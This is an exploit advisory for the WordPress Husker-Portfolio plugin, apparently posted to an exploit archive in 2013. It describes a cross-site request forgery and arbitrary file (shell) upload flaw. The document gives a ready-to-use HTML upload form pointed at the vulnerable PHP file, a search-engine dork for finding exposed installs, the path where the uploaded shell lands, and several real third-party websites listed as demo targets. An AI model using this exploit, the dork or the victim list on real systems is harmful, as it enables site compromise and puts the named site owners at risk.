WordPress Husker-Portfolio plugin suffers from cross site request forgery and remote shell upload vulnerabilities.
52694aee56f7f32774676888e8e4cd6ab05db7c9ae6993e62059d2d164b4700e
###############################################################
# Exploit Title: Wordpress Husker-Portfolio plugins CSRF File Upload
Vulnerability
# Author: Ashiyane Digital Security Team
# Date: 12/09/2013
# Vendor : http://www.huskerinfotech.com/
# Software Link :
http://downloads.wordpress.org/plugin/huskerportfolio.0.3.zip
# Google dork: inurl:/wp-content/plugins/huskerPortfolio/
# Tested on: Windows/Linux
###############################################################
1)Exploit :
= = = = = =
<form enctype="multipart/form-data"
action="
http://127.0.0.1/wordpress/wp-content/plugins/huskerPortfolio/huskerPortfolio.php
"
method="post"> <b>choose a file:</b><br/><input name="image" type="file"
/><br/>
<input type="submit" value="upload" />
</form>
2)Exploit Demo :
= = = = = = =
http://secondbaptistoxford.org/wp-content/plugins/huskerPortfolio/huskerPortfolio.php
http://floralicious.ie/wp-content/plugins/huskerPortfolio/huskerPortfolio.php
http://oakforestinteriors.co.uk/wp-content/plugins/huskerportfolio/huskerPortfolio.php
http://oakforestinteriors.co.uk/wp-content/plugins/huskerportfolio/huskerPortfolio.php
# #### #### #### #### #### #### #### #### #
# http://[Target]/wp-content/plugins/huskerPortfolio/upload/[file]
# #### #### #### #### #### #### #### #### #
# BY T3rm!nat0r5
# E-mail : poya.terminator@gmail.com
# #### #### #### #### #### #### #### #### #